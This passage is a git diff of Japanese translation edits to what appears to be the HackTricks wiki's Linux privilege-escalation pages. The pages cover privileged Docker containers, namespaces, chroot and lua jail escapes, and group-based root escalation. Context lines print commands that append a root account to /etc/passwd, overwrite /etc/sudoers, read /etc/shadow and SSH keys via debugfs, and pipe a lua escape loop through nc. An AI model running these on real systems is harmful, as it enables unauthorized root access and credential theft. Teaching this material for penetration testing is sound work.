Seccomp)。他のシステムコールはエスケープを試みるために使用される可能性があります。 diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index cdd664233..799bfb542 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -4,11 +4,11 @@ ## 影響するもの -特権コンテナを実行すると、これらの保護が無効になります: +特権コンテナを実行すると、無効にする保護は次のとおりです。 ### /devのマウント -特権コンテナでは、すべての**デバイスが`/dev/`でアクセス可能です**。したがって、ホストのディスクを**マウント**することで**エスケープ**できます。 +特権コンテナでは、すべての**デバイスが`/dev/`でアクセス可能です**。したがって、ホストのディスクを**マウント**することで**脱出**できます。 {{#tabs}} {{#tab name="Inside default container"}} @@ -20,7 +20,7 @@ core full null pts shm stdin tty zero ``` {{#endtab}} -{{#tab name="特権コンテナ内"}} +{{#tab name="Inside Privileged Container"}} ```bash # docker run --rm --privileged -it alpine sh ls /dev @@ -33,7 +33,7 @@ cpu nbd0 pts stdout tty27 {{#endtab}} {{#endtabs}} -### 読み取り専用のカーネルファイルシステム +### 読み取り専用カーネルファイルシステム カーネルファイルシステムは、プロセスがカーネルの動作を変更するためのメカニズムを提供します。しかし、コンテナプロセスに関しては、カーネルに対して変更を加えることを防ぎたいと考えています。したがって、カーネルファイルシステムをコンテナ内で**読み取り専用**としてマウントし、コンテナプロセスがカーネルを変更できないようにします。 @@ -59,9 +59,9 @@ mount | grep '(ro' ### カーネルファイルシステムのマスキング -**/proc**ファイルシステムは選択的に書き込み可能ですが、セキュリティのために、特定の部分は**tmpfs**で覆われており、コンテナプロセスが機密領域にアクセスできないようにしています。 +**/proc** ファイルシステムは選択的に書き込み可能ですが、セキュリティのために、特定の部分は **tmpfs** でオーバーレイされ、コンテナプロセスが機密エリアにアクセスできないように保護されています。 -> [!NOTE] > **tmpfs**は、すべてのファイルを仮想メモリに保存するファイルシステムです。tmpfsはハードドライブ上にファイルを作成しません。したがって、tmpfsファイルシステムをアンマウントすると、その中に存在するすべてのファイルは永遠に失われます。 +> [!NOTE] > **tmpfs** はすべてのファイルを仮想メモリに保存するファイルシステムです。tmpfs はハードドライブ上にファイルを作成しません。したがって、tmpfs ファイルシステムをアンマウントすると、その中に存在するすべてのファイルは永遠に失われます。 {{#tabs}} {{#tab name="Inside default container"}} @@ -74,7 +74,7 @@ tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) ``` {{#endtab}} -{{#tab name="特権コンテナ内"}} +{{#tab name="Inside Privileged Container"}} ```bash # docker run --rm --privileged -it alpine sh mount | grep /proc.*tmpfs @@ -114,7 +114,7 @@ Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fset {{#endtab}} {{#endtabs}} -コンテナに対して利用可能な機能を、`--privileged` モードで実行せずに、`--cap-add` および `--cap-drop` フラグを使用して操作できます。 +`--privileged` モードで実行せずに、`--cap-add` および `--cap-drop` フラグを使用して、コンテナに利用可能な機能を操作できます。 ### Seccomp @@ -134,7 +134,7 @@ Seccomp_filters: 1 ``` {{#endtab}} -{{#tab name="特権コンテナ内"}} +{{#tab name="Inside Privileged Container"}} ```bash # docker run --rm --privileged -it alpine sh grep Seccomp /proc/1/status @@ -147,11 +147,11 @@ Seccomp_filters: 0 # You can manually disable seccomp in docker with --security-opt seccomp=unconfined ``` -また、Docker(または他のCRIs)が**Kubernetes**クラスターで使用されるとき、**seccompフィルターはデフォルトで無効**になっていることに注意してください。 +また、**Kubernetes** クラスターで Docker(または他の CRI)が使用されるとき、**seccomp フィルターはデフォルトで無効**になります。 ### AppArmor -**AppArmor**は、**コンテナ**を**制限された**リソースのセットに制限するためのカーネル拡張です。**プログラムごとのプロファイル**を使用します。`--privileged`フラグを使用して実行すると、この保護は無効になります。 +**AppArmor** は、**コンテナ** を **制限された** **リソース** のセットに制限するためのカーネル拡張です。これは **プログラムごとのプロファイル** を使用します。`--privileged` フラグを使用して実行すると、この保護は無効になります。 {{#ref}} apparmor.md @@ -175,7 +175,7 @@ apparmor.md ### ネームスペース -ネームスペースは **`--privileged`** フラグの影響を **受けません**。セキュリティ制約が有効でないにもかかわらず、例えば **システム上のすべてのプロセスやホストネットワークを見ることはできません**。ユーザーは **`--pid=host`、`--net=host`、`--ipc=host`、`--uts=host`** コンテナエンジンフラグを使用して個々のネームスペースを無効にできます。 +ネームスペースは **`--privileged`** フラグの影響を **受けません**。セキュリティ制約が有効になっていないにもかかわらず、例えば **システム上のすべてのプロセスやホストネットワークを見ることはできません**。ユーザーは **`--pid=host`、`--net=host`、`--ipc=host`、`--uts=host`** コンテナエンジンフラグを使用して、個々のネームスペースを無効にすることができます。 {{#tabs}} {{#tab name="Inside default privileged container"}} @@ -203,7 +203,7 @@ PID USER TIME COMMAND ### ユーザー名前空間 -**デフォルトでは、コンテナエンジンはユーザー名前空間を利用しませんが、ルートレスコンテナはファイルシステムのマウントや複数のUIDを使用するためにそれを必要とします。** ルートレスコンテナに不可欠なユーザー名前空間は無効にできず、特権を制限することでセキュリティを大幅に向上させます。 +**デフォルトでは、コンテナエンジンはユーザー名前空間を利用しませんが、rootlessコンテナはファイルシステムのマウントや複数のUIDを使用するためにそれを必要とします。** ユーザー名前空間はrootlessコンテナに不可欠であり、無効にすることはできず、特権を制限することでセキュリティを大幅に向上させます。 ## 参考文献 diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index f3c45d350..37ca33f08 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -1,44 +1,51 @@ -# ネームスペース +# 名前空間 {{#include ../../../../banners/hacktricks-training.md}} -### **PID ネームスペース** +### **PID 名前空間** + {{#ref}} pid-namespace.md {{#endref}} -### **マウント ネームスペース** +### **マウント名前空間** + {{#ref}} mount-namespace.md {{#endref}} -### **ネットワーク ネームスペース** +### **ネットワーク名前空間** + {{#ref}} network-namespace.md {{#endref}} -### **IPC ネームスペース** +### **IPC 名前空間** + {{#ref}} ipc-namespace.md {{#endref}} -### **UTS ネームスペース** +### **UTS 名前空間** + {{#ref}} uts-namespace.md {{#endref}} -### タイム ネームスペース +### 時間名前空間 + {{#ref}} time-namespace.md {{#endref}} -### ユーザー ネームスペース +### ユーザー名前空間 + {{#ref}} user-namespace.md diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index bca2f613e..b756b3e13 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -4,18 +4,19 @@ ## 基本情報 -cgroup 名前空間は、**名前空間内で実行されているプロセスのための cgroup 階層の隔離を提供する Linux カーネルの機能**です。cgroups(制御グループの略)は、CPU、メモリ、I/O などの**システムリソースに対する制限を管理および強制するためにプロセスを階層的にグループ化することを可能にするカーネル機能**です。 +cgroup 名前空間は、**名前空間内で実行されているプロセスのための cgroup 階層の隔離を提供する** Linux カーネルの機能です。cgroups(制御グループの略)は、CPU、メモリ、I/O などの**システムリソースに対する制限を管理および強制するためにプロセスを階層的なグループに整理する**ことを可能にするカーネル機能です。 -cgroup 名前空間は、以前に議論した他の名前空間タイプ(PID、マウント、ネットワークなど)とは異なる独立した名前空間タイプではありませんが、名前空間の隔離の概念に関連しています。**cgroup 名前空間は cgroup 階層のビューを仮想化し**、cgroup 名前空間内で実行されているプロセスは、ホストや他の名前空間で実行されているプロセスとは異なる階層のビューを持ちます。 +cgroup 名前空間は、以前に議論した他の名前空間タイプ(PID、マウント、ネットワークなど)とは異なる独立した名前空間タイプではありませんが、名前空間の隔離の概念に関連しています。**Cgroup 名前空間は cgroup 階層のビューを仮想化し**、cgroup 名前空間内で実行されているプロセスは、ホストや他の名前空間で実行されているプロセスとは異なる階層のビューを持ちます。 ### 仕組み: -1. 新しい cgroup 名前空間が作成されると、**それは作成プロセスの cgroup に基づいた cgroup 階層のビューから始まります**。これは、新しい cgroup 名前空間内で実行されるプロセスが、作成プロセスの cgroup に根ざした cgroup サブツリーに制限された、全体の cgroup 階層のサブセットのみを表示することを意味します。 -2. cgroup 名前空間内のプロセスは、**自分の cgroup を階層のルートとして見る**ことになります。これは、名前空間内のプロセスの視点から見ると、自分の cgroup がルートとして表示され、他のサブツリーの外にある cgroup を見ることもアクセスすることもできないことを意味します。 -3. cgroup 名前空間はリソースの隔離を直接提供するわけではありません; **それは cgroup 階層のビューの隔離のみを提供します**。**リソースの制御と隔離は、cgroup** サブシステム(例: cpu、memory など)自体によって強制されます。 +1. 新しい cgroup 名前空間が作成されると、**それは作成プロセスの cgroup に基づいた cgroup 階層のビューで始まります**。これは、新しい cgroup 名前空間内で実行されるプロセスが、作成プロセスの cgroup に根ざした cgroup サブツリーに制限された、全体の cgroup 階層のサブセットのみを表示することを意味します。 +2. cgroup 名前空間内のプロセスは、**自分の cgroup を階層のルートとして見る**ことになります。これは、名前空間内のプロセスの視点から、自分の cgroup がルートとして表示され、他のサブツリーの外にある cgroup を見ることもアクセスすることもできないことを意味します。 +3. cgroup 名前空間はリソースの隔離を直接提供するわけではありません; **それは cgroup 階層のビューの隔離のみを提供します**。**リソースの制御と隔離は、cgroup** サブシステム(例: cpu、memory など)自体によって依然として強制されます。 CGroups に関する詳細情報は次を確認してください: + {{#ref}} ../cgroups.md {{#endref}} @@ -28,29 +29,29 @@ CGroups に関する詳細情報は次を確認してください: ```bash sudo unshare -C [--mount-proc] /bin/bash ``` -新しいインスタンスの `/proc` ファイルシステムを `--mount-proc` パラメータを使用してマウントすることで、新しいマウント名前空間がその名前空間に特有のプロセス情報の**正確で孤立したビュー**を持つことを保証します。 +新しいインスタンスの `/proc` ファイルシステムを `--mount-proc` パラメータを使用してマウントすることで、新しいマウントネームスペースがそのネームスペースに特有のプロセス情報の**正確で隔離されたビュー**を持つことを保証します。
エラー: bash: fork: メモリを割り当てることができません -`unshare` が `-f` オプションなしで実行されると、Linux が新しい PID (プロセス ID) 名前空間を処理する方法のためにエラーが発生します。重要な詳細と解決策は以下の通りです: +`unshare` が `-f` オプションなしで実行されると、Linux が新しい PID (プロセス ID) ネームスペースを処理する方法のためにエラーが発生します。重要な詳細と解決策は以下の通りです: 1. **問題の説明**: -- Linux カーネルはプロセスが `unshare` システムコールを使用して新しい名前空間を作成することを許可します。しかし、新しい PID 名前空間の作成を開始するプロセス(「unshare」プロセスと呼ばれる)は新しい名前空間に入らず、その子プロセスのみが入ります。 -- `%unshare -p /bin/bash%` を実行すると、`unshare` と同じプロセスで `/bin/bash` が開始されます。その結果、`/bin/bash` とその子プロセスは元の PID 名前空間に存在します。 -- 新しい名前空間の `/bin/bash` の最初の子プロセスは PID 1 になります。このプロセスが終了すると、他にプロセスがない場合、孤児プロセスを引き取る特別な役割を持つ PID 1 により名前空間のクリーンアップがトリガーされます。Linux カーネルはその名前空間での PID 割り当てを無効にします。 +- Linux カーネルは、プロセスが `unshare` システムコールを使用して新しいネームスペースを作成することを許可します。しかし、新しい PID ネームスペースの作成を開始するプロセス(「unshare」プロセスと呼ばれる)は新しいネームスペースに入らず、その子プロセスのみが入ります。 +- `%unshare -p /bin/bash%` を実行すると、`unshare` と同じプロセスで `/bin/bash` が開始されます。その結果、`/bin/bash` とその子プロセスは元の PID ネームスペースに存在します。 +- 新しいネームスペース内の `/bin/bash` の最初の子プロセスは PID 1 になります。このプロセスが終了すると、他にプロセスがない場合、孤児プロセスを引き取る特別な役割を持つ PID 1 によりネームスペースのクリーンアップがトリガーされます。Linux カーネルはそのネームスペース内での PID 割り当てを無効にします。 2. **結果**: -- 新しい名前空間での PID 1 の終了は `PIDNS_HASH_ADDING` フラグのクリーンアップを引き起こします。これにより、新しいプロセスを作成する際に `alloc_pid` 関数が新しい PID を割り当てることに失敗し、「メモリを割り当てることができません」というエラーが発生します。 +- 新しいネームスペース内での PID 1 の終了は、`PIDNS_HASH_ADDING` フラグのクリーンアップを引き起こします。これにより、新しいプロセスを作成する際に `alloc_pid` 関数が新しい PID を割り当てることに失敗し、「メモリを割り当てることができません」というエラーが発生します。 3. **解決策**: -- この問題は、`unshare` に `-f` オプションを使用することで解決できます。このオプションにより、`unshare` は新しい PID 名前空間を作成した後に新しいプロセスをフォークします。 -- `%unshare -fp /bin/bash%` を実行すると、`unshare` コマンド自体が新しい名前空間で PID 1 になります。これにより、`/bin/bash` とその子プロセスはこの新しい名前空間内に安全に収容され、PID 1 の早期終了を防ぎ、正常な PID 割り当てを可能にします。 +- この問題は、`unshare` に `-f` オプションを使用することで解決できます。このオプションにより、`unshare` は新しい PID ネームスペースを作成した後に新しいプロセスをフォークします。 +- `%unshare -fp /bin/bash%` を実行すると、`unshare` コマンド自体が新しいネームスペース内で PID 1 になります。これにより、`/bin/bash` とその子プロセスはこの新しいネームスペース内に安全に収容され、PID 1 の早期終了を防ぎ、正常な PID 割り当てを可能にします。 -`unshare` が `-f` フラグで実行されることを保証することで、新しい PID 名前空間が正しく維持され、`/bin/bash` とそのサブプロセスがメモリ割り当てエラーに遭遇することなく動作できるようになります。 +`unshare` が `-f` フラグで実行されることを保証することで、新しい PID ネームスペースが正しく維持され、`/bin/bash` とそのサブプロセスがメモリ割り当てエラーに遭遇することなく動作できるようになります。
@@ -58,7 +59,7 @@ sudo unshare -C [--mount-proc] /bin/bash ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` -### プロセスがどの名前空間にあるかを確認する +### プロセスがどの名前空間にいるかを確認する ```bash ls -l /proc/self/ns/cgroup lrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> 'cgroup:[4026531835]' @@ -73,7 +74,7 @@ sudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \; 2>/dev/null ```bash nsenter -C TARGET_PID --pid /bin/bash ``` -また、**ルートでない限り、他のプロセスの名前空間に入ることはできません**。そして、**ディスクリプタ**がそれを指していない限り(例えば `/proc/self/ns/cgroup`)、他の名前空間に**入ることはできません**。 +他のプロセスの名前空間に**入ることができるのはルートユーザーのみ**です。また、**ディスクリプタ**(例えば`/proc/self/ns/cgroup`)がないと他の名前空間に**入ることはできません**。 ## 参考文献 diff --git a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index d8c92cb0f..3d53d2bed 100644 --- a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -8,16 +8,16 @@ ## Chroot エスケープ -[ウィキペディア](https://en.wikipedia.org/wiki/Chroot#Limitations)より: chroot メカニズムは **特権のある** (**root**) **ユーザーによる意図的な改ざんに対して防御することを目的としていません**。ほとんどのシステムでは、chroot コンテキストは正しくスタックされず、十分な特権を持つ chroot プログラムは **二度目の chroot を実行して脱出することができます**。\ +[wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations) より: chroot メカニズムは **特権のある** (**root**) **ユーザーによる意図的な改ざんに対して防御することを目的としていません**。ほとんどのシステムでは、chroot コンテキストは正しくスタックされず、十分な特権を持つ chroot プログラムは **二度目の chroot を実行して脱出することができます**。\ 通常、脱出するには chroot 内で root である必要があります。 > [!TIP] -> **ツール** [**chw00t**](https://github.com/earthquake/chw00t) は、次のシナリオを悪用して `chroot` から脱出するために作成されました。 +> **ツール** [**chw00t**](https://github.com/earthquake/chw00t) は、以下のシナリオを悪用して `chroot` から脱出するために作成されました。 ### Root + CWD > [!WARNING] -> chroot 内で **root** である場合、**別の chroot** を作成することで **脱出** できます。これは、2 つの chroot が共存できないため (Linux では)、フォルダーを作成し、その新しいフォルダー上に **新しい chroot を作成** すると、**その外にいるあなた** は **新しい chroot の外にいることになり**、したがってファイルシステム内にいることになります。 +> chroot 内で **root** である場合、**別の chroot** を作成することで **脱出** できます。これは、2 つの chroot が共存できないため (Linux では)、フォルダーを作成し、その新しいフォルダーで **新しい chroot を作成**すると、**その外にいるあなた**は **新しい chroot の外にいることになります**。したがって、ファイルシステム内にいることになります。 > > これは通常、chroot が作業ディレクトリを指定された場所に移動しないために発生します。したがって、chroot を作成できますが、その外にいることになります。 @@ -79,7 +79,7 @@ system("/bin/bash"); ### Root + Saved fd > [!WARNING] -> これは前のケースに似ていますが、この場合、**攻撃者は現在のディレクトリへのファイルディスクリプタを保存し**、その後**新しいフォルダにchrootを作成します**。最後に、**chrootの外部でそのFDにアクセスできるため**、それにアクセスし、**脱出**します。 +> これは前のケースに似ていますが、この場合、**攻撃者は現在のディレクトリへのファイルディスクリプタを保存し**、その後**新しいフォルダにchrootを作成します**。最後に、彼は**chrootの外でそのFDにアクセスできるため**、それにアクセスし、**脱出**します。
@@ -116,7 +116,7 @@ chroot("."); > - 子プロセスで異なるフォルダ内でchrootを実行する > - 親プロセスで、新しい子プロセスのchrootの外にあるフォルダのFDを作成する > - UDSを使用してそのFDを子プロセスに渡す -> - 子プロセスはそのFDにchdirし、chrootの外にいるため、脱出することができる +> - 子プロセスはそのFDにchdirし、chrootの外にいるため、監獄から脱出する ### Root + Mount @@ -139,7 +139,7 @@ chroot("."); > [!WARNING] > -> - フォーク(子プロセス)を作成し、FSのより深い異なるフォルダにchrootし、その上でCDする +> - フォーク(子プロセス)を作成し、FSのより深いフォルダにchrootし、その上でCDする > - 親プロセスから、子プロセスがいるフォルダを子のchrootの前のフォルダに移動する > - この子プロセスはchrootの外にいることになる @@ -147,7 +147,7 @@ chroot("."); > [!WARNING] > -> - 以前はユーザーが自分のプロセスを自分のプロセスからデバッグできましたが... これはもはやデフォルトでは不可能です +> - 以前はユーザーが自分のプロセスを自分のプロセスからデバッグできましたが、これはもはやデフォルトでは不可能です > - それでも、可能であれば、プロセスにptraceし、その中でシェルコードを実行することができます([この例を参照](linux-capabilities.md#cap_sys_ptrace))。 ## Bash Jails @@ -177,14 +177,14 @@ echo /home/* #List directory ``` ### スクリプトを作成 -_/bin/bash_ を内容とする実行可能ファイルを作成できるか確認してください。 +_check if you can create an executable file with _/bin/bash_ as content_ ```bash red /bin/bash > w wx/path #Write /bin/bash in a writable and executable path ``` ### SSHからbashを取得する -ssh経由でアクセスしている場合、このトリックを使用してbashシェルを実行できます: +ssh経由でアクセスしている場合、このトリックを使用してbashシェルを実行できます: ```bash ssh -t user@ bash # Get directly an interactive shell ssh user@ -t "bash --noprofile -i" @@ -205,10 +205,11 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers ### その他のトリック [**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\ -[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ -[https://gtfobins.github.io](https://gtfobins.github.io/**](https/gtfobins.github.io)\ +[https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ +[https://gtfobins.github.io](https://gtfobins.github.io)\ **ページも興味深いかもしれません:** + {{#ref}} ../bypass-bash-restrictions/ {{#endref}} @@ -217,6 +218,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers 次のページで Python ジェイルからの脱出に関するトリックがあります: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -238,7 +240,7 @@ print(rawget(string, "char")(0x41, 0x42)) ```bash for k,v in pairs(string) do print(k,v) end ``` -注意してください。前のワンライナーを**異なるlua環境で実行するたびに関数の順序が変わります**。したがって、特定の関数を実行する必要がある場合は、異なるlua環境をロードしてleライブラリの最初の関数を呼び出すことでブルートフォース攻撃を行うことができます。 +注意してください、前のワンライナーを**異なるlua環境で実行するたびに関数の順序が変わります**。したがって、特定の関数を実行する必要がある場合は、異なるlua環境をロードしてle libraryの最初の関数を呼び出すブルートフォース攻撃を実行できます。 ```bash #In this scenario you could BF the victim that is generating a new lua environment #for every interaction with the following line and when you are lucky @@ -249,7 +251,7 @@ for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end #and "char" from string library, and the use both to execute a command for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done ``` -**インタラクティブなluaシェルを取得する**: 制限されたluaシェル内にいる場合は、次のように呼び出すことで新しいluaシェル(できれば無制限)を取得できます: +**インタラクティブなluaシェルを取得**: 制限されたluaシェル内にいる場合は、次のように呼び出すことで新しいluaシェル(できれば無制限)を取得できます: ```bash debug.debug() ``` diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index d67d4a065..dac973726 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,12 +1,12 @@ -# 興味深いグループ - Linux Privesc +# 興味深いグループ - Linux特権昇格 {{#include ../../../banners/hacktricks-training.md}} -## Sudo/Admin グループ +## Sudo/Adminグループ -### **PE - 方法 1** +### **PE - メソッド 1** -**時々**、**デフォルトで(またはいくつかのソフトウェアが必要とするために)** **/etc/sudoers** ファイル内にこれらの行のいくつかを見つけることができます: +**時々**、**デフォルトで(またはいくつかのソフトウェアが必要とするために)** **/etc/sudoers**ファイル内にこれらの行のいくつかを見つけることができます: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL @@ -26,12 +26,12 @@ sudo su ```bash find / -perm -4000 2>/dev/null ``` -バイナリ **pkexec が SUID バイナリ** であり、あなたが **sudo** または **admin** に属している場合、`pkexec` を使用して sudo としてバイナリを実行できる可能性があります。\ -これは通常、これらが **polkit ポリシー** 内のグループであるためです。このポリシーは基本的に、どのグループが `pkexec` を使用できるかを特定します。次のコマンドで確認してください: +もしバイナリ **pkexec が SUID バイナリ** であり、あなたが **sudo** または **admin** に属している場合、`pkexec` を使用して sudo としてバイナリを実行できる可能性があります。\ +これは通常、これらが **polkit ポリシー** 内のグループだからです。このポリシーは基本的に、どのグループが `pkexec` を使用できるかを特定します。次のコマンドで確認してください: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` -そこでは、どのグループが**pkexec**を実行することを許可されているか、そして**デフォルトで**いくつかのLinuxディストリビューションでは、グループ**sudo**と**admin**が表示されるかを見つけることができます。 +そこでは、どのグループが**pkexec**を実行することを許可されているかがわかります。また、いくつかのLinuxディストリビューションでは、**sudo**および**admin**グループが**デフォルトで**表示されます。 **rootになるには、次のコマンドを実行できます**: ```bash @@ -56,13 +56,13 @@ pkttyagent --process #Step 2, attach pkttyagent to session1 ``` ## Wheel Group -**時々**、**デフォルトで** **/etc/sudoers** ファイル内にこの行が見つかります: +**時には**、**デフォルトで** **/etc/sudoers** ファイル内にこの行を見つけることができます: ``` %wheel ALL=(ALL:ALL) ALL ``` これは、**wheelグループに属する任意のユーザーがsudoとして何でも実行できる**ことを意味します。 -この場合、**rootになるには、単に次を実行すればよい**: +この場合、**rootになるには次のコマンドを実行するだけです**: ``` sudo su ``` @@ -74,11 +74,11 @@ sudo su ``` So, read the file and try to **crack some hashes**. -## Staff Group +## スタッフグループ -**staff**: ユーザーがルート権限を必要とせずにシステムにローカル変更を加えることを許可します(`/usr/local`)。`/usr/local/bin`内の実行可能ファイルは、任意のユーザーのPATH変数に含まれており、同じ名前の`/bin`および`/usr/bin`内の実行可能ファイルを「上書き」する可能性があります。「adm」グループと比較してください。これは監視/セキュリティに関連しています。 [\[source\]](https://wiki.debian.org/SystemGroups) +**staff**: ユーザーがルート権限を必要とせずにシステムにローカル変更を加えることを許可します(`/usr/local`)。 `/usr/local/bin`内の実行可能ファイルは、すべてのユーザーのPATH変数に含まれており、同じ名前の`/bin`および`/usr/bin`内の実行可能ファイルを「上書き」する可能性があります。 監視/セキュリティに関連する「adm」グループと比較してください。 [\[source\]](https://wiki.debian.org/SystemGroups) -debianディストリビューションでは、`$PATH`変数は、特権ユーザーであろうとなかろうと、`/usr/local/`が最優先で実行されることを示しています。 +Debianディストリビューションでは、`$PATH`変数は、特権ユーザーであろうとなかろうと、`/usr/local/`が最優先で実行されることを示しています。 ```bash $ echo $PATH /usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games @@ -88,7 +88,7 @@ $ echo $PATH ``` `/usr/local`にあるいくつかのプログラムをハイジャックできれば、簡単にrootを取得できます。 -`run-parts`プログラムをハイジャックすることは、rootを取得する簡単な方法です。なぜなら、ほとんどのプログラムは(crontabやsshログイン時など) `run-parts`を実行するからです。 +`run-parts`プログラムをハイジャックすることは、rootを取得する簡単な方法です。なぜなら、ほとんどのプログラムは(crontabやSSHログイン時など) `run-parts`を実行するからです。 ```bash $ cat /etc/crontab | grep run-parts 17 * * * * root cd / && run-parts --report /etc/cron.hourly @@ -141,7 +141,7 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` -debugfsを使用すると、**ファイルを書き込む**こともできることに注意してください。例えば、`/tmp/asd1.txt`を`/tmp/asd2.txt`にコピーするには、次のようにします: +debugfsを使用すると、**ファイルを書き込む**こともできることに注意してください。たとえば、`/tmp/asd1.txt`を`/tmp/asd2.txt`にコピーするには、次のようにします: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt @@ -150,13 +150,13 @@ debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ## Video Group -コマンド`w`を使用すると、**システムにログインしているユーザー**を見つけることができ、次のような出力が表示されます: +コマンド`w`を使用すると、**システムにログインしているユーザー**を確認でき、次のような出力が表示されます: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` -**tty1**は、ユーザー**yossiが物理的に**マシンのターミナルにログインしていることを意味します。 +**tty1**は、ユーザー**yossiが物理的に**マシンの端末にログインしていることを意味します。 **video group**は、画面出力を表示するアクセス権を持っています。基本的に、画面を観察することができます。そのためには、**画面上の現在の画像を生データで取得**し、画面が使用している解像度を取得する必要があります。画面データは`/dev/fb0`に保存でき、この画面の解像度は`/sys/class/graphics/fb0/virtual_size`で見つけることができます。 ```bash @@ -193,7 +193,7 @@ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/pa #Ifyou just want filesystem and network access you can startthe following container: docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash ``` -最終的に、以前の提案が気に入らない場合や、何らかの理由で機能しない場合(docker api firewall?)、ここで説明されているように、**特権コンテナを実行してそこから脱出する**ことを試すことができます: +最後に、以前の提案が気に入らない場合や、何らかの理由で機能しない場合(docker api firewall?)、ここで説明されているように、**特権コンテナを実行してそこから脱出する**ことを試すことができます: {{#ref}} ../docker-security/ @@ -217,12 +217,12 @@ https://fosterelli.co/privilege-escalation-via-docker.html ## Adm グループ -通常、**`adm`** グループの**メンバー**は、_ /var/log/_ 内にあるログファイルを**読む**権限を持っています。\ +通常、**`adm`** グループの**メンバー**は、_ /var/log/_ 内にある**ログ**ファイルを**読む**権限を持っています。\ したがって、このグループ内のユーザーを侵害した場合は、**ログを確認する**べきです。 ## Auth グループ -OpenBSD内では、**auth** グループは通常、_**/etc/skey**_ および _**/var/db/yubikey**_ フォルダーに書き込むことができます。\ -これらの権限は、以下のエクスプロイトを使用して**特権を昇格させる**ために悪用される可能性があります:[https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) +OpenBSD内では、**auth** グループは通常、使用されている場合に_**/etc/skey**_ および _**/var/db/yubikey**_ フォルダーに書き込むことができます。\ +これらの権限は、特権をrootに昇格させるために次のエクスプロイトを悪用することができます:[https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md index 335f3398c..759e9c913 100644 --- a/src/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md @@ -10,7 +10,7 @@ AD内のLinuxマシンは、**異なるCCACHEチケットをファイル内に ### LinuxからのAD列挙 -Linux(またはWindowsのbash)でADにアクセスできる場合、ADを列挙するために[https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn)を試すことができます。 +Linux(またはWindowsのbash)でADにアクセスできる場合、[https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn)を試してADを列挙できます。 LinuxからADを列挙する**他の方法**を学ぶには、次のページを確認してください: @@ -20,7 +20,7 @@ LinuxからADを列挙する**他の方法**を学ぶには、次のページを ### FreeIPA 